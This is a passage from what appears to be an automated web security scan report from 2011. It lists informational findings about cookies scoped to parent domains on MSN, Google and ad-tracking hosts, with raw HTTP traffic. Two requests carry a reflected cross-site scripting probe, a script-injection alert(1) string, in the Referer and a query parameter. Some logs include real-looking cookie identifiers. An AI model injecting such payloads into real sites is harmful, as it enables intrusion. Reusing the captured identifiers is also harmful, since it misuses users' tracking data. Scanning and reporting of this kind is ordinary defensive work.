The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /new-cars/default.aspx HTTP/1.1
Host: editorial.autos.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:32:27 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=775a706ba27249818384c9ddc6f0be26; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=452825B919744E0CBD3D811A7E5DDB62; domain=.autos.msn.com; expires=Sat, 20-Aug-2011 15:32:27 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 38354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.65. http://editorial.autos.msn.com/used-cars/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.msn.com
Path:	/used-cars/default.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=a42dce0f38a347f48d33b0d543fa5631; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=718D92C75E2A4AC1AED19F22E9A0BF40; domain=.autos.msn.com; expires=Sat, 20-Aug-2011 15:32:27 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /used-cars/default.aspx HTTP/1.1
Host: editorial.autos.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:32:27 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA54
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a42dce0f38a347f48d33b0d543fa5631; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=718D92C75E2A4AC1AED19F22E9A0BF40; domain=.autos.msn.com; expires=Sat, 20-Aug-2011 15:32:27 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 34201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.66. http://entertainment.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://entertainment.msn.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=b39c3a5d929f4c56b9f0ed54cc0437f4; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.67. http://entertainment.msn.com/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://entertainment.msn.com
Path:	/news/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=5ee08328c5854a91b8ceda54850cba49; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/ HTTP/1.1
Host: entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.68. http://entertainment.msn.com/video/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://entertainment.msn.com
Path:	/video/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=ab9a494b3ce24782ad4af7e40153d000; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /video/ HTTP/1.1
Host: entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.69. http://groups.google.com/groups previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://groups.google.com
Path:	/groups

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=b5e0034c1c17149b:TM=1296574467:LM=1296574467:S=MCQiCWxvNtVoqgA-; expires=Thu, 31-Jan-2013 15:34:27 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /groups?q=millenium+boston&um=1&ie=UTF-8&sa=N&hl=en&tab=wg HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:34:27 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=b5e0034c1c17149b:TM=1296574467:LM=1296574467:S=MCQiCWxvNtVoqgA-; expires=Thu, 31-Jan-2013 15:34:27 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: DiscussionFE
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>Google Groups</title><link href="/groups/search_static/u7kY4_DCZv8/dfe.css" rel="stylesheet" type="text/css"><style>
...[SNIP]...

11.70. http://health.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://health.msn.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=7308e0c789104f31abdeb2e68a6d57ff; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=6F3EFCB2F9904D1D9B49CA53FAC866EF; domain=.msn.com; expires=Sat, 20-Aug-2011 15:34:44 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: health.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:34:44 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA24
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=7308e0c789104f31abdeb2e68a6d57ff; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=6F3EFCB2F9904D1D9B49CA53FAC866EF; domain=.msn.com; expires=Sat, 20-Aug-2011 15:34:44 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 37486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://
...[SNIP]...

11.71. http://health.msn.com/health-topics/quit-smoking/articlepage.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://health.msn.com
Path:	/health-topics/quit-smoking/articlepage.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=a0a61b8a17324a34bcefa62237ce7c6d; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=6FC2D6913483462A84559AE5C41E3ABF; domain=.msn.com; expires=Sat, 20-Aug-2011 15:34:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /health-topics/quit-smoking/articlepage.aspx HTTP/1.1
Host: health.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:34:46 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA19
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a0a61b8a17324a34bcefa62237ce7c6d; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=6FC2D6913483462A84559AE5C41E3ABF; domain=.msn.com; expires=Sat, 20-Aug-2011 15:34:46 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 35881

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.72. http://hit.clickaider.com/clickaider.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hit.clickaider.com
Path:	/clickaider.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=3e136b53-42127475201; Path=/; Version=1; Domain=.clickaider.com; Expires=Thu, 02 Feb 2012 20:08:08 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clickaider.js HTTP/1.1
Host: hit.clickaider.com
Proxy-Connection: keep-alive
Referer: http://boardreader.com/domain/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(1)%3C/script%3E6f696982a6d=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="/w3c/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
Expires: Thu, 03 Feb 2011 20:08:08 GMT
Cache-Control: private, max-age=86400
Set-Cookie: vid=3e136b53-42127475201; Path=/; Version=1; Domain=.clickaider.com; Expires=Thu, 02 Feb 2012 20:08:08 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
Date: Wed, 02 Feb 2011 20:08:08 GMT
Server: lighttpd/1.4.18
Content-Length: 9501

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e)
...[SNIP]...

11.73. http://hit.clickaider.com/pv previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hit.clickaider.com
Path:	/pv

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

clickdata=eNptys0KwjAQBOB3WSjoQdNsbNJsEQ%2Fig6TNFgv2hySiIr67rQe9eJv5ZhxJekaSOYFttZG5LjcFVI6KhQ1B5OiZJ6g6klUkJEjxU9BqbQxaNasi6P5z4BbmJC3BOaWJhKivYRLxPN7ETi1TQcBDCo%2FPLc9%2Fv9EFH9h5Dttm7IUfe9cNAns%2FbAdO4o544JpbkyFm6pSpY2xCN6U5uwuHtJLr2cQXdauttiU67fcSqtfrDS1OScw%3D; path=/; domain=.clickaider.com
sid=d269a5c2-241228395777; path=/; domain=.clickaider.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pv?lng=660&a1=468x60;383x35;AdSense;ca-pub-4537085524273794;2660416438;468x60_as;text_image;333333;FFFFFF;105cb6;4F7500;FFFFFF;&a2=300x250;269x710;AdSense;ca-pub-4537085524273794;3510583841;300x250_as;text_image;333333;FFFFFF;105cb6;4F7500;FFFFFF;&a3=728x90;2220x30;AdSense;ca-pub-4537085524273794;5128047824;728x90_as;text_image;333333;FFFFFF;105cb6;4F7500;FFFFFF;&&lnks=&t=2mdn.net%2Fx22%20-%20Domain%20Profile%20%7C%20BoardReader&c=9f671068-5&r=http%3A%2F%2Fburp%2Fshow%2F43&tz=-360&var1=domain%20profile&var3=general%20user&loc=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E6f696982a6d%3D1&rnd=1309 HTTP/1.1
Host: hit.clickaider.com
Proxy-Connection: keep-alive
Referer: http://boardreader.com/domain/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(1)%3C/script%3E6f696982a6d=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=3e136b53-42127475201

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
P3P: policyref="/w3c/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
Set-Cookie: clickdata=eNptys0KwjAQBOB3WSjoQdNsbNJsEQ%2Fig6TNFgv2hySiIr67rQe9eJv5ZhxJekaSOYFttZG5LjcFVI6KhQ1B5OiZJ6g6klUkJEjxU9BqbQxaNasi6P5z4BbmJC3BOaWJhKivYRLxPN7ETi1TQcBDCo%2FPLc9%2Fv9EFH9h5Dttm7IUfe9cNAns%2FbAdO4o544JpbkyFm6pSpY2xCN6U5uwuHtJLr2cQXdauttiU67fcSqtfrDS1OScw%3D; path=/; domain=.clickaider.com
Set-Cookie: sid=d269a5c2-241228395777; path=/; domain=.clickaider.com
Cache-Control: no-cache, private, proxy-revalidate, max-age=86400
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43
Date: Wed, 02 Feb 2011 20:08:13 GMT
Server: lighttpd/1.4.18

GIF89a.............!.......,...........D..;

11.74. http://i.simpli.fi/dpx.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.simpli.fi
Path:	/dpx.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=riSVQ01JdHij7HwVqTSiAg==; expires=Thu, 02-Feb-12 15:12:56 GMT; domain=simpli.fi; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dpx.js?cid=88 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: i.simpli.fi

Response

HTTP/1.1 200 OK
Server: nginx/0.8.33
Date: Wed, 02 Feb 2011 15:12:56 GMT
Content-Type: application/x-javascript
Content-Length: 1866
Last-Modified: Tue, 18 Jan 2011 18:52:13 GMT
Connection: close
Set-Cookie: uid=riSVQ01JdHij7HwVqTSiAg==; expires=Thu, 02-Feb-12 15:12:56 GMT; domain=simpli.fi; path=/
Accept-Ranges: bytes

(function() {

var script = findScript();

if (!script) return;

var query = script.src.replace(/^[^\?]+\??/, ''),
params = parseQuery(query),
rand = Math.floor(Math
...[SNIP]...

11.75. http://ib.adnxs.com/getuidu previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/getuidu

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Tue, 03-May-2011 15:17:18 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuidu?http://segment-pixel.invitemedia.com/setuid?exchange_id=2&exchange_uid=$UID HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://pixel.invitemedia.com/data_sync?partner_id=219
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG5+^DYS3+0s]#%2L_'x%SEV/i#-^]=FzXN9?TZi)>y1-3qNzX$-sWMR*dKdv#mm-w:$FfP3d/2Gd7^ksuS1Gw*N7yL:JS<*!oa5rz0.w=eY[jlqv=q6NhB120tXCccNFiR8p(/932ONsZ/FhOpYF`Fe-_p@?zs0$+6rgOdt@[+(YpJ(L*s>[=[mJPaTkc-k0<kEMNyo8q_ge93--wY'5#NCxtE:-.Dd(-ObhJsPL<iP4eDccH?l%tga?e3Vf[_/O)Q?WwIBG(KrQk4K_[7s:8jt(^er57hn!1N+$lE.Y:1V+2g=/)8:@0FVIF^@8+X`/O([RWwG_o.dN%I3W<.coX>TP!(6vdn[(w^

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 15:17:18 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Tue, 03-May-2011 15:17:18 GMT; domain=.adnxs.com; HttpOnly
Location: http://segment-pixel.invitemedia.com/setuid?exchange_id=2&exchange_uid=4760492999213801733
Date: Wed, 02 Feb 2011 15:17:18 GMT
Content-Length: 0

11.76. http://ib.adnxs.com/px previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/px

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Mon, 02-May-2011 15:24:16 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Mon, 02-May-2011 15:24:16 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG5+^DYS3+0s]#%2L_'x%SEV/i#-^]=FzXN9?TZi)>y1-3qNzX$-sWMR*dKdv#mm-w:$FfP3d/2Gd7^ksuS1Gw*N7yL:JS<*!oa5rz0.w=eY[jlqv=q6NhB120tXCccNFiR8p(/932ONsZ/FhOpYF`Fe-_p@?zs0$+6rgOdt@[+(YpJ(L*s>[=[mJPaTkc-k0<kEMNyo8q_ge93--wY'5#NCxtE:-.Dd(-ObhJsPL<iP4eDccH?l%tga?e3Vf[_/O)Q?WwIBG(KrQk4K_[7s:8jt(^er57hn!1N+$lE.Y:1V+2g=/)8:@0FVIF^@8+X`/O([RWwG_o.dN%I3W<.coX>TP!(6vdn[(w^; path=/; expires=Mon, 02-May-2011 15:24:16 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /px?member_id=174&seg_code=HOT,US,MA_H,BOSTON_MA,orbitz,NOSST&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/cacheable/ad.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; uuid2=4760492999213801733; anj=Kfu=8fG5EfDYS3+0s]#%2L_'x%SEV/i#-ET=FzXN9?TZi)>y1-3qNzX$-sWMR*dKdv#mm-w:$FfP3d/2Gd7^ksuS1Gw*N7yL:JS<*!oa5rz0.w=eY[jlqv=q6NhB120tXCccNFiR8p(/932ONsZ/FhOpYF`Fe-_p@?zs0$+6rgOdt@[+(YpJ(L*s>[=[mJPaTkc-k0<kEMNyo8q_ge93--wY'5#NCxtE:-.Dd(-ObhJsPL<iP4eDccH?l%tga?e3Vf[_/O)Q?WwIBG(KrQk4K_[7s:8jt(^er57hn!13/QcRI0aU8Y`dCC*j^2`kdi6<PokBhdMkdL

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 02-Feb-2011 15:24:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Mon, 02-May-2011 15:24:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Mon, 02-May-2011 15:24:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5+^DYS3+0s]#%2L_'x%SEV/i#-^]=FzXN9?TZi)>y1-3qNzX$-sWMR*dKdv#mm-w:$FfP3d/2Gd7^ksuS1Gw*N7yL:JS<*!oa5rz0.w=eY[jlqv=q6NhB120tXCccNFiR8p(/932ONsZ/FhOpYF`Fe-_p@?zs0$+6rgOdt@[+(YpJ(L*s>[=[mJPaTkc-k0<kEMNyo8q_ge93--wY'5#NCxtE:-.Dd(-ObhJsPL<iP4eDccH?l%tga?e3Vf[_/O)Q?WwIBG(KrQk4K_[7s:8jt(^er57hn!1N+$lE.Y:1V+2g=/)8:@0FVIF^@8+X`/O([RWwG_o.dN%I3W<.coX>TP!(6vdn[(w^; path=/; expires=Mon, 02-May-2011 15:24:16 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Tue, 01 Feb 2011 15:24:16 GMT

GIF89a.............!.......,........@..L..;

11.77. http://id.google.com/verify/EAAAAE_-e4uKsVJHxtz4cPOf7JM.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAE_-e4uKsVJHxtz4cPOf7JM.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SNID=43=3vQhgRVNB3h3QLsaTkCSkHIiOnaN2Jby-UMzZZUUQg=avCM2zCK3xcw-GGm; expires=Thu, 04-Aug-2011 15:46:10 GMT; path=/verify; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAE_-e4uKsVJHxtz4cPOf7JM.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://updates.orbitz.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=43=dXxArotuJyDYQ1VQrpKm701uNT9DB3GX-tg4wIuY7Q=dcvOXnVctesqr6XP; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; SSDATA-DOMAIN=ikjREw(0:; TZ=360; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=43=3vQhgRVNB3h3QLsaTkCSkHIiOnaN2Jby-UMzZZUUQg=avCM2zCK3xcw-GGm; expires=Thu, 04-Aug-2011 15:46:10 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Wed, 02 Feb 2011 15:46:10 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

11.78. http://id.google.com/verify/EAAAAFdw42YFAA5jJ6_W2uU2sso.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAFdw42YFAA5jJ6_W2uU2sso.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

NID=43=aWKQVkJB3udhJK82hEh4MwqvHNpb94hy2PKtpCyHYXDFAzMN1aXXx5a52t-KKeTvI2_Jezp4iHIKgku8tiR3ibi0u8HszaXSdr1MrAVfprFbxHK4mHq7emHAmYln-2H0; expires=Wed, 03-Aug-2011 15:25:02 GMT; path=/; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAFdw42YFAA5jJ6_W2uU2sso.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.typeOfSearch=keyword&hotel.locationKeywordInput.key=Boston%2C+MA%2C+United+States&hotel.locId=loc.pid%3A11231&hotel.locationAddressInput.addressInput.countryCode=US&hotel.locationAddressInput.addressInput.addressLine1=&hotel.locationAddressInput.addressInput.city=&hotel.locationAddressInput.addressInput.stateProvinceCode=&hotel.locationAddressInput.addressInput.postalCode=&hotel.hotelSearchDetails.checkinDate=02%2F01%2F11&hotel.hotelSearchDetails.checkoutDate=02%2F02%2F11&hotel.hotelSearchDetails.numberOfRooms=1&hotel.hotelSearchDetails.rooms%5B0%5D.numberOfAdults=2&hotel.hotelSearchDetails.rooms%5B1%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B2%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B3%5D.numberOfAdults=1&hotel.hotelRating=&hotel.hotelChain=&hotel.hotelName=&hotel.couponCode=&search=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=43=dXxArotuJyDYQ1VQrpKm701uNT9DB3GX-tg4wIuY7Q=dcvOXnVctesqr6XP; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=43=pmnSJWiZwGth09kNohAMwJvIpkIdJSJlqyMqx-omPXiSQSzkkNSHqGwv9A9J-zJ5JWsywblLTMJRa23z5AiuJrUbUWrTlS9i8IOD2l1hjJpMR5EY4CTSxmfm-gxCfk12; SSDATA-DOMAIN=ikjREw(0:; TZ=360

Response

HTTP/1.1 200 OK
Set-Cookie: NID=43=aWKQVkJB3udhJK82hEh4MwqvHNpb94hy2PKtpCyHYXDFAzMN1aXXx5a52t-KKeTvI2_Jezp4iHIKgku8tiR3ibi0u8HszaXSdr1MrAVfprFbxHK4mHq7emHAmYln-2H0; expires=Wed, 03-Aug-2011 15:25:02 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Tue, 01 Feb 2011 15:25:02 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

11.79. http://id.google.com/verify/EAAAAGw6wehKYIfPfAuhig8lJow.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAGw6wehKYIfPfAuhig8lJow.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

